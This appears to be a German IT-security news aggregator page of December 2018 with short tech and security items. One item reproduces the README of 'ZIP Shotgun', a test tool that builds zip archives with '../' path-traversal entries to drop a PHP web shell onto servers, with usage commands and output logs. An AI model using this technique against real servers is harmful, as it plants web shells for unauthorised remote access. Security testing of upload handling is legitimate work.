1. IT-Security >
  2. Cyber Security Nachrichten


ArabicEnglishFrenchGermanGreekItalianJapaneseKoreanPersianPolishPortugueseRussianSpanishTurkishVietnamese
Anzeige

Nachrichten


Suchen

Sean Parker Builds Beach-Access App To Atone For His Rule-Violating Wedding

IT Security Nachrichten vom 16.12.2018 um 12:34 Uhr | Quelle tech.slashdot.org
An anonymous reader quotes the Associated Press: A tech billionaire whose elaborate wedding in a redwood grove violated California rules has helped create a smartphone app that shows users a map of more than 1,500 spots where people can get to the coastline. The California Coastal Commission unveiled the YourCoast app at its meeting Thursday in Newport Beach. "This is an only in California story," Commission Chair Dayna Bochco said in a statement. "Where else could you find a tech mogul partnering with a regulator to help the public get to the beach?" Sean Parker, co-founder of file-sharing service Napster, agreed to help make the educational tool after he built a large site resembling a movie set for his wedding in an ecologically sensitive area of Big Sur without proper permits. However, the commission determined the construction in a campground area wouldn't harm the environment and the wedding was allowed to proceed. Parker, a former president of Facebook, also paid $2.5 million in penalties, which helped fund hiking trails, field trips and other efforts to increase public access to the popular tourist area. It was a rare high-profile coastal violation case resolved with cooperation rather than a legal fight.

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

some free vpn service android app collecting users data including their behavior

IT Security Nachrichten vom 16.12.2018 um 12:19 Uhr | Quelle reddit.com
submitted by /u/prosen780
[link] [comments]
Newsbewertung

Weiterlesen

BSI hat keine Bedenken oder gar Beweise im "Spionagefall Huawei"

IT Security Nachrichten vom 16.12.2018 um 11:37 Uhr | Quelle winfuture.de
Polizei, Kriminalität, Fbi, Agent Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat sich jetzt zum Streit um die Spionagevorwürfe gegen das chinesische Unternehmen Huawei zu Wort gemeldet. In einem Interview erklärte der BSI-Chef Arne Schönbohm, dass man für drastische Maßnahmen wie in den USA hierzulande derzeit keine Beweggründe habe. (Weiter lesen)
Newsbewertung

Weiterlesen

Smart Innovation Steyr feiert 5-jähriges Jubiläum

IT Security Nachrichten vom 16.12.2018 um 10:22 Uhr | Quelle google.com
Auch 2019 wird Smart Innovation Steyr vieles bewegen. Der Fokus liegt auf Bewährtes wie die Stammtische 4.0, der IT Security Summit VISIT und ...
Newsbewertung

Weiterlesen

Smart Innovation Steyr feiert 5-jähriges Jubiläum

IT Security Nachrichten vom 16.12.2018 um 10:22 Uhr | Quelle google.com
Auch 2019 wird Smart Innovation Steyr vieles bewegen. Der Fokus liegt auf Bewährtes wie die Stammtische 4.0, der IT Security Summit VISIT und ...
Newsbewertung

Weiterlesen

Netflix für Comics: InkyPen startet am Montag für die Nintendo Switch

IT Security Nachrichten vom 16.12.2018 um 09:59 Uhr | Quelle winfuture.de
Konsole, Nintendo, Netflix, Nintendo Konsole, Nintendo Switch, Switch, Release, Flatrate, Ankündigung, Service, Abonnement, Comics, Erscheinungstermin, InkyPen Während der beliebte Streaming-Dienst Netflix noch immer nicht für die Nintendo Switch zur Verfügung steht, wird jetzt ein weiterer Abo-Service auf die Hybrid-Konsole gebracht. Der Comic-Dienst InkyPen wurde schon auf der Gamescom 2018 exklusiv für die Nintendo Switch angekündigt. (Weiter lesen)
Newsbewertung

Weiterlesen

Christmas Calendar: A pragmatic look at secure password storage for users

IT Security Nachrichten vom 16.12.2018 um 09:47 Uhr | Quelle reddit.com
Christmas Calendar: A pragmatic look at secure password storage for users submitted by /u/stian_f
[link] [comments]

Newsbewertung

Weiterlesen

Mutant Year Zero: Road to Eden Review (PC)

IT Security Nachrichten vom 16.12.2018 um 09:47 Uhr | Quelle softpedia.com
Some would say that X-COM is the father of the turn-based strategy genre, mostly because every new game that tackles the same genre is influenced by Take-Two's cult franchise. Mutant Year Zero: Road to Eden is no exception, although it would be totally unfair to say that it's an X-COM ripoff. Mutant Year Zero is quite unique, not just because it masterfully blends turn-based strategy and real-time stealth elements, but also because of the setting and characters. Many of you probably didn't know (I for sure didn't) that the game is based on the Mutant Year Zero tabletop RPG featuring half human half animal mutants, psionics and other weird forms of life. In this particular case, the folks at The Bearded Ladies chose to depict a post-apocalyptic Scandinavia (if you're living there, you'll most certainly recognize some locations). Although it's quite light on the story and lore, Mutant Year Zero delivers a surprisingly solid experience from the beginning to the end. ...
Newsbewertung

Weiterlesen

Study Reveals The Most Googled 'Should I' Questions In Each State

IT Security Nachrichten vom 16.12.2018 um 09:34 Uhr | Quelle tech.slashdot.org
An anonymous reader quotes BGR: One of the more interesting 2018 retrospectives we've seen focuses on which Google searches were the most popular across each state. Specifically, AT&T tapped into data from Google Trends and came up with a rather amusing look at the most popular "should I..." questions on a state by state basis. "Should I vote" was the most-popular question in seven states, which isn't surprising, given the exciting races in many areas. Indiana and Michigan, on the other hand, are more concerned with the other four-letter v-word: vape. Other interesting results: The most popular question in Washington was "Should I delete Facebook?" The most popular question in California was "Should I move out?" The most popular question in Texas was "Should I apologize?" The most popular question in both Nevada and New Hampshire was "Should I buy bitcoin?" Although the article warns that "If you're asking Google what you should or shouldn't do, you probably already know the answer."

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

War der Datendiebstahl bei der Marriott-Hotelkette politisch motiviert?

IT Security Nachrichten vom 16.12.2018 um 09:26 Uhr | Quelle google.com
Das melden die Security-Experten von Vectra. ... Gérard Bauer, VP EMEA bei Vectra, einem Anbieter von IT-Security auf Basis künstlicher Intelligenz, ...
Newsbewertung

Weiterlesen

Gekaufte Bewertung: Amazon wird Angebot der Fake Reviews nicht Herr

IT Security Nachrichten vom 16.12.2018 um 09:20 Uhr | Quelle winfuture.de
Amazon, Logo, Versandhandel Auch nach Amazons Feldzug gegen gefälschte, bezahlte, positive Produktbewertungen geht das Treiben mit den Fake Reviews munter weiter. Jetzt hat auch die Stiftung Warentest das Thema wieder aufgenommen und warnt vor vermeintlichen Nutzerbewertungen, die miese Produkte hochjubeln. (Weiter lesen)
Newsbewertung

Weiterlesen

The Google Pixel 3 Experiment: Two Weeks Without My iPhone

IT Security Nachrichten vom 16.12.2018 um 08:20 Uhr | Quelle news.softpedia.com
Two weeks ago, just after Google rolled out an advertising campaign called Unswitchable, I decided to test the search giant’s claims on my own. While you can read more about this experiment here, the idea behind this whole thing is to test Google’s promise that the Google Pixel 3 makes you love it after just three weeks of use no matter what phone you owned before. My preliminary conclusions after a week with the Pixel 3 are available here, but if you’re more interested in a TLDR, it basically comes down to this. I was still unswitchable, and while...
Newsbewertung

Weiterlesen

Crash analytics

IT Security Nachrichten vom 16.12.2018 um 07:34 Uhr | Quelle reddit.com

Hey guys I have found a pwSafe substitute for Mac/IOS and I really like everything about it....

But it is supposed to be an offline password manager and it has crash analytics... what would you guys think about a password app that is reporting crash analytics? Would it bother you or should I ditch it now?

submitted by /u/imillonario
[link] [comments]
Newsbewertung

Weiterlesen

Sieben Tipps für die Auswahl einer Backup-Infrastruktur

IT Security Nachrichten vom 16.12.2018 um 07:01 Uhr | Quelle it-daily.net

Backups in der Cloud bieten viele Vorteile, zum Beispiel Zugriff jederzeit und von überall aus. Es gibt aber auch einiges zu beachten, etwa um Kostenexplosionen zu vermeiden. Je nach Anforderungen kann sich daher eine On-Premises- oder eine hybride Lösung empfehlen.


Newsbewertung

Weiterlesen

Is The World Shifting To 'Ambient Computing'?

IT Security Nachrichten vom 16.12.2018 um 06:34 Uhr | Quelle tech.slashdot.org
In the future, "A massive convergence of technologies will enable us to use computers and the internet without really using them," argues Computerworld. At the dawn of the personal computing revolution, people "operated" a computer. They sat down and did computing -- often programming. Later, with the application explosion, operators became "users." People used computers for purposes other than programming or operating a computer -- like balancing their checkbooks or playing video games. All computing uses so far have required a cognitive shift from doing something in the real world to operating or using a computer. Ambient computing changes all that, because it involves using a computer without consciously or deliberately or explicitly "using" a computer.... It's just there, guiding and nudging you along as you accomplish things in life. Ambient computing devices will operate invisibly in the background. They'll identify, monitor and listen to us and respond to our perceived needs and habits. So a good working definition of ambient computing is "computing that happens in the background without the active participation of the user...." In 20 years, the idea of picking up a device or sitting down at a computer to actively use it will seem quaintly antiquated. All computing will be ambient -- all around us all the time, whispering in our ear, augmenting the real world through our prescription eyeglasses and car windshields, perceiving our emotions and desires and taking action in the background to help us reach our business goals and live a better life. Between now and then we'll all ride together on a very interesting journey from computers we actively use to computing resources increasingly acting in the background for us. Though the article identifies smart speakers are the first ambient computing devices most people will encounter, it's argues that that's just the beginning of a much larger change. "We're also going to be flooded and overwhelmed by the 'ambient computing' hype as, I predict, it will become one of the most overused and abused marketing buzzwords ever."

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

Top 10 Best Programming Apps for Android (Latest)

IT Security Nachrichten vom 16.12.2018 um 06:17 Uhr | Quelle itechhacks.com

Programming is the essential core to become a Hacker. But many says, we can only learn Programming on PC but in 2019, there are number free apps available on play store through which you could easily learn programming. (Best programming apps) Android mobiles may not be an ideal workplace for programmers. Laptops and PC’s are […]

The post Top 10 Best Programming Apps for Android (Latest) appeared first on iTech Hacks.


Newsbewertung

Weiterlesen

Adventszeit: Spam nimmt Online-Shopper ins Visier

IT Security Nachrichten vom 16.12.2018 um 06:01 Uhr | Quelle it-daily.net

Der IT-Sicherheitsanbieter F-Secure warnt vor Spam-Mails als beliebte Angriffsmethode in der Adventszeit. Die Taktik, schädliche Inhalte in Versandhinweisen oder Rechnungen zu verstecken, ist laut Forschern von F-Secure in der Vorweihnachtszeit noch effektiver als normalerweise.


Newsbewertung

Weiterlesen

How Microsoft Embraced Python

IT Security Nachrichten vom 16.12.2018 um 03:34 Uhr | Quelle developers.slashdot.org
Steve Dower, a Python developer at Microsoft, describes how the language become popular internally: In 2010, our few Pythonistas were flying under the radar, in case somebody noticed that they could reassign a few developers to their own project. The team was small, leftover from a previous job, but was chipping away at a company culture that suffered from "not invented here" syndrome: Python was a language that belonged to other people, and so Microsoft was not interested. Over the last eight years, the change has been dramatic. Many Microsoft products now include Python support, and some of the newest only support Python. Some of our critical tools are written in Python, and we are actively investing in the language and community.... In 2018, we are out and proud about Python, supporting it in our developer tools such as Visual Studio and Visual Studio Code, hosting it in Azure Notebooks, and using it to build end-user experiences like the Azure CLI. We employ five core CPython developers and many other contributors, are strong supporters of open-source data science through NumFOCUS and PyData, and regularly sponsor, host, and attend Python events around the world. "We often felt like a small startup within a very large company" Downer writes, in a post for the Medium community "Microsoft Open Source Stories."

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

People Are Harassing Waymo's Self-Driving Vehicles

IT Security Nachrichten vom 16.12.2018 um 01:34 Uhr | Quelle tech.slashdot.org
Waymo's testing dozens of self-driving mini-vans near Phoenix. Now the Arizona Republic asks why the vehicles are getting so much hate, citing "a slashed tire, a pointed gun, bullies on the road..." "Police have responded to dozens of calls regarding people threatening and harassing Waymo vans." That was clear August 19, when police were called because a 37-year-old man who police described as "heavily intoxicated" was standing in front of a Waymo and not allowing the van to proceed. "He stated he was sick and tired of the Waymo vehicles driving in his neighborhood, and apparently thought the best idea to resolve this was to stand in front of one of these vehicles," Officer Richard Rimbach wrote in a report. Phil Simon, an information systems lecturer at Arizona State University and author of several books on technology, said angst from residents is probably less about how the Waymo vans drive and more about people frustrated with what Waymo represents. "This stuff is happening fast and a lot of people are concerned that technology is going to run them out of a job," Simon said. Simon said it is hard for middle-class people to celebrate technological breakthroughs like self-driving cars if they have seen their own wages stagnate or even decline in recent years. "There are always winners and losers, and these are probably people who are afraid and this is a way for them to fight back in some small, futile way," Simon said. "Something tells me these are not college professors or vice presidents who are doing well." Police used video footage from Waymo to identify the license plate of a Jeep that kept driving head-on toward Waymo's test car -- six different times, one in which the driver then slammed on the brakes, jumped out of their car, and demanded that Waymo get out of their neighborhood. Another local resident told the newspaper that "Everybody hates Waymo drivers. They are dangerous." On four separate occasions, people have thrown rocks. A 69-year-old man was even arrested for pointing a revolver at the test driver in a passing Waymo car. He later told police he was trying to scare Waymo's driver, and "stated that he despises and hates those cars." He was charged with aggravated assault and disorderly conduct. The man's wife told reporters he'd been diagnosed with dementia, but the Arizona Republic calls it "one of at least 21 interactions documented by local police during the past two years where people have harassed the autonomous vehicles and their human test drivers," adding "There may be many undocumented instances where people threatened Waymo drivers..." "The self-driving vans use radar, lidar and cameras to navigate, so they capture footage of all interactions that usually is clear enough to identify people and read license plates," the paper adds. (Waymo later cites its "ongoing work" with communities "including Arizona law enforcement and first responders.") When one local news crew followed Waymo vehicles for 170 miles to critique their driving, a Waymo driver eventually pulled into a police station "because the driver was concerned we might've been harassing them. After they learned we were with the media, they let us go on our way."

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

People Are Harassing Waymo's Self-Driving Vehicles

IT Security Nachrichten vom 16.12.2018 um 01:34 Uhr | Quelle tech.slashdot.org
Waymo's testing dozens of self-driving mini-vans near Phoenix. Now the Arizona Republic asks why the vehicles are getting so much hate, citing "a slashed tire, a pointed gun, bullies on the road..." "Police have responded to dozens of calls regarding people threatening and harassing Waymo vans." That was clear August 19, when police were called because a 37-year-old man who police described as "heavily intoxicated" was standing in front of a Waymo and not allowing the van to proceed. "He stated he was sick and tired of the Waymo vehicles driving in his neighborhood, and apparently thought the best idea to resolve this was to stand in front of one of these vehicles," Officer Richard Rimbach wrote in a report. Phil Simon, an information systems lecturer at Arizona State University and author of several books on technology, said angst from residents is probably less about how the Waymo vans drive and more about people frustrated with what Waymo represents. "This stuff is happening fast and a lot of people are concerned that technology is going to run them out of a job," Simon said. Simon said it is hard for middle-class people to celebrate technological breakthroughs like self-driving cars if they have seen their own wages stagnate or even decline in recent years. "There are always winners and losers, and these are probably people who are afraid and this is a way for them to fight back in some small, futile way," Simon said. "Something tells me these are not college professors or vice presidents who are doing well." Police used video footage from Waymo to identify the license plate of a Jeep that kept driving head-on toward Waymo's test car -- six different times, one in which the driver then slammed on the brakes, jumped out of their car, and demanded that Waymo get out of their neighborhood. Another local resident told the newspaper that "Everybody hates Waymo drivers. They are dangerous." On four separate occasions, people have thrown rocks. A 69-year-old man was even arrested for pointing a revolver at the test driver in a passing Waymo car. He later told police he was trying to scare Waymo's driver, and "stated that he despises and hates those cars." He was charged with aggravated assault and disorderly conduct. The man's wife told reporters he'd been diagnosed with dementia, but the Arizona Republic calls it "one of at least 21 interactions documented by local police during the past two years where people have harassed the autonomous vehicles and their human test drivers," adding "There may be many undocumented instances where people threatened Waymo drivers..." "The self-driving vans use radar, lidar and cameras to navigate, so they capture footage of all interactions that usually is clear enough to identify people and read license plates," the paper adds. (Waymo later cites its "ongoing work" with communities "including Arizona law enforcement and first responders.") When one local news crew followed Waymo vehicles for 170 miles to critique their driving, a Waymo driver eventually pulled into a police station "because the driver was concerned we might've been harassing them. After they learned we were with the media, they let us go on our way."

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

CNN Contributor Urges: Stop Calling Facebook a Tech Company

IT Security Nachrichten vom 16.12.2018 um 00:35 Uhr | Quelle yro.slashdot.org
An anonymous reader quotes a CNN opinion piece by Stanford business school lecturer David Dodson: "Senator, we run ads." That's what Mark Zuckerberg told Senator Orrin Hatch earlier this year during his congressional testimony when asked to describe Facebook's business model. The 84-year-old senator was later mocked on social media for not understanding modern technology. But I'd argue that the wily senior senator understood Facebook's business quite well. Hatch was simply getting Mark Zuckerberg to say it out loud. Sometimes it takes an old guy to call out a youngster.... For media companies that run ads, especially ones that use public networks, we tell them that they can't lie or mislead, that it's not okay to advertise cigarettes to children or push prescription drugs without including the risks. We have laws governing deceptive advertisements and Truth in Advertising laws. Companies that run ads can't say a car gets 40 miles per gallon unless it's true. They can't say a movie won an Academy Award unless it did. If you say the wool comes from New Zealand, it must.... When nearly half of Americans get their news from Facebook, its newsfeed should be subjected to the same standards of fairness, decency and accuracy as newspapers, television and other media outlets.... Calling Facebook a tech company is how we got into so much trouble. It's also why, when Zuckerberg answered Hatch, the 34-year-old billionaire smiled in a way that was interpreted by many as smug. As if the senator was too antiquated to grasp the complexities of Facebook's revenue model. I see it differently. The company founder was offering a grin of acknowledgment. The jig was up. Facebook places ads just like most media companies do and should be held to the same overall standards.

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

Do Alternative Software Licenses Represent Open Source's 'Midlife Crisis'?

IT Security Nachrichten vom 15.12.2018 um 23:34 Uhr | Quelle news.slashdot.org
"it is clear to me that open source -- now several decades old and fully adult -- is going through its own midlife crisis," writes Joyent CTO Bryan Cantrill. [O]pen source business models are really tough, selling software-as-a-service is one of the most natural of them, the cloud service providers are really good at it -- and their commercial appetites seem boundless. And, like a new cherry red two-seater sports car next to a minivan in a suburban driveway, some open source companies are dealing with this crisis exceptionally poorly: they are trying to restrict the way that their open source software can be used. These companies want it both ways: they want the advantages of open source -- the community, the positivity, the energy, the adoption, the downloads -- but they also want to enjoy the fruits of proprietary software companies in software lock-in and its concomitant monopolistic rents. If this were entirely transparent (that is, if some bits were merely being made explicitly proprietary), it would be fine: we could accept these companies as essentially proprietary software companies, albeit with an open source loss-leader. But instead, these companies are trying to license their way into this self-contradictory world: continuing to claim to be entirely open source, but perverting the license under which portions of that source are available. Most gallingly, they are doing this by hijacking open source nomenclature. Of these, the laughably named commons clause is the worst offender (it is plainly designed to be confused with the purely virtuous creative commons), but others...are little better... "[T]heir business model isn't their community's problem, and they should please stop trying to make it one," Cantrill writes, adding letter that "As we collectively internalize that open source is not a business model on its own, we will likely see fewer VC-funded open source companies (though I'm honestly not sure that that's a bad thing)..." He also points out that "Even though the VC that led the last round wants to puke into a trashcan whenever they hear it, business models like 'support', 'services' and 'training' are entirely viable!" Jay Kreps, Co-founder of @confluentinc, has posted a rebuttal on Medium. "How do you describe a license that lets you run, modify, fork, and redistribute the code and do virtually anything other than offer a competing SaaS offering of the product? I think Bryan's sentiment may be that it should be called the Evil Proprietary Corruption of Open Source License or something like that, but, well, we disagree."

Read more of this story at Slashdot.


Newsbewertung

Weiterlesen

Hackers Enslaving More and More Smart Home Networks

IT Security Nachrichten vom 15.12.2018 um 23:30 Uhr | Quelle hackercombat.com

The name given to smart home devices may actually be a misnomer given the findings of Netscout, a security research firm. According to the researchers, hackers are increasingly using the...

The post Hackers Enslaving More and More Smart Home Networks appeared first on .


Newsbewertung

Weiterlesen

Ally Bank app fingerprint access persists after password change

IT Security Nachrichten vom 15.12.2018 um 22:53 Uhr | Quelle reddit.com

Seems like terrible security design: If you log in through the Ally Bank Android app, and authorize the fingerprint verification option as an alternative to entering your account password, the fingerprint verification will continue to work even after changing your login password.

Is it just me, or does that seem like terrible security design? A password change should trigger the requirement to enter the new password on any device before attaining access.

I lost the phone I had originally verified, so wanted a fresh start. Had to reach out to support and have them open a ticket to de-authorize the old phone.

submitted by /u/Forking_Shirtballs
[link] [comments]
Newsbewertung

Weiterlesen

ZIP Shotgun - Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities

IT Security Nachrichten vom 15.12.2018 um 22:46 Uhr | Quelle feedproxy.google.com

Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. Idea for this script comes from this post on Silent Signal Techblog - Compressed File Upload And Command Execution and from OWASP - Test Upload of Malicious Files
This script will create archive which contains files with "../" in filename. When extracting this could cause files to be extracted to preceding directories. It can allow attacker to extract shells to directories which can be accessed from web browser.
Default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available HERE

Installation
  1. Install using Python pip
    pip install zip-shotgun --upgrade
  2. Clone git repository and install
    git clone https://github.com/jpiechowka/zip-shotgun.git
    Execute from root directory of the cloned repository (where setup.py file is located)
    pip install . --upgrade

Usage and options
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

Options:
--version Show the version and exit.
-c, --directories-count INTEGER
Count of how many directories to go back
inside the zip file (e.g 3 means that 3
files will be added to the zip: shell.php,
../shell.php and ../../shell.php where
shell.php is the name of the shell you
provided or randomly generated value
[default: 16]
-n, --shell-name TEXT Name of the shell inside the generated zip
file (e.g shell). If not provided it will be
randomly generated. Cannot have whitespaces
-f, --shell-file-path PATH A file that contains code for the shell. If
this option is not provided wwwolf
(https://github.com/WhiteWinterWolf/wwwolf-
php-webshell) php shell will be added
instead. If name is provided it will be
added to the zip with the provided name or
if not provided the name will be randomly
generated.
--compress Enable compression. If this flag is set
archive will be compressed using DEFALTE
algorithm with compression level of 9. By
default there is no compression applied.
-h, --help Show this message and exit.

Examples
  1. Using all default options
    zip-shotgun archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
    12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
    ...
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
  2. Using default options and enabling compression for archive file
    zip-shotgun --compress archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
    12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    ...
    12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
  3. Using default options but changing the number of directories to go back in the archive to 3
    zip-shotgun --directories-count 3 archive.zip
    zip-shotgun -c 3 archive.zip
    The script will write 3 files in total to the archive
    Part of the script output
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
    12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
  4. Using default options but providing shell name inside archive and enabling compression
    Shell name cannot have whitespaces
    zip-shotgun --shell-name custom-name --compress archive.zip
    zip-shotgun -n custom-name --compress archive.zip
    Name for shell files inside the archive will be set to the one provided by the user.
    Part of the script output
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php
    ...
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL
  5. Provide custom shell file but use random name inside archive. Set directories count to 3
    zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
    zip-shotgun -c 3 -f ./custom-shell.php archive.zip
    Shell code will be extracted from user provided file. Names inside the archive will be randomly generated.
    Part of the script output
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
  6. Provide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression
    zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
    zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
    Shell code will be extracted from user provided file. Names inside the archive will be set to user provided name.
    Part of the script output
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL



Newsbewertung

Weiterlesen

Study Suggests Too Much Collaboration Actually Hurts Productivity

IT Security Nachrichten vom 15.12.2018 um 22:34 Uhr | Quelle it.slashdot.org
